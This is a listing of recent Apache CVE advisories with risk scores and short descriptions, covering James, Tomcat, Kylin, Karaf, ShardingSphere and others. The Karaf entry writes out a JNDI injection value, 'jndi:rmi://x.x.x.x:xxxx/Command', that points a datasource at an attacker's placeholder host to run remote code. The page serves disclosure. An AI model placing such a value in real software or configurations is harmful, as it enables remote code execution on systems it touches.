Vulnerabilities > Apache

DATE CVE VULNERABILITY TITLE RISK
2023-01-06 CVE-2022-45787 Cleartext Storage of Sensitive Information vulnerability in Apache James
Unproper laxist permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users.
local
low complexity
apache CWE-312
5.5
2023-01-06 CVE-2022-45935 Unspecified vulnerability in Apache James
Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit.
local
low complexity
apache
5.5
2023-01-04 CVE-2022-45875 Unspecified vulnerability in Apache Dolphinscheduler
Improper validation of script alert plugin parameters in Apache DolphinScheduler to avoid remote command execution vulnerability.
network
low complexity
apache
critical
9.8
2023-01-03 CVE-2022-45143 Unspecified vulnerability in Apache Tomcat
The JsonErrorReportValve in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 did not escape the type, message or description values.
network
low complexity
apache
7.5
2023-01-03 CVE-2021-32824 Unspecified vulnerability in Apache Dubbo
Apache Dubbo is a java based, open source RPC framework.
network
low complexity
apache
critical
9.8
2022-12-30 CVE-2022-43396 Unspecified vulnerability in Apache Kylin
In the fix for CVE-2022-24697, a blacklist is used to filter user input commands.
network
low complexity
apache
8.8
2022-12-30 CVE-2022-44621 Command Injection vulnerability in Apache Kylin
Diagnosis Controller miss parameter validation, so user may attacked by command injection via HTTP Request.
network
low complexity
apache CWE-77
critical
9.8
2022-12-22 CVE-2022-45347 Unspecified vulnerability in Apache Shardingsphere
Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client.
network
low complexity
apache
critical
9.8
2022-12-21 CVE-2022-40145 Unspecified vulnerability in Apache Karaf
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
network
low complexity
apache
critical
9.8
2022-12-20 CVE-2022-46421 Command Injection vulnerability in Apache Apache-Airflow-Providers-Apache-Hive
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Hive Provider: before 5.0.0.
network
low complexity
apache CWE-77
critical
9.8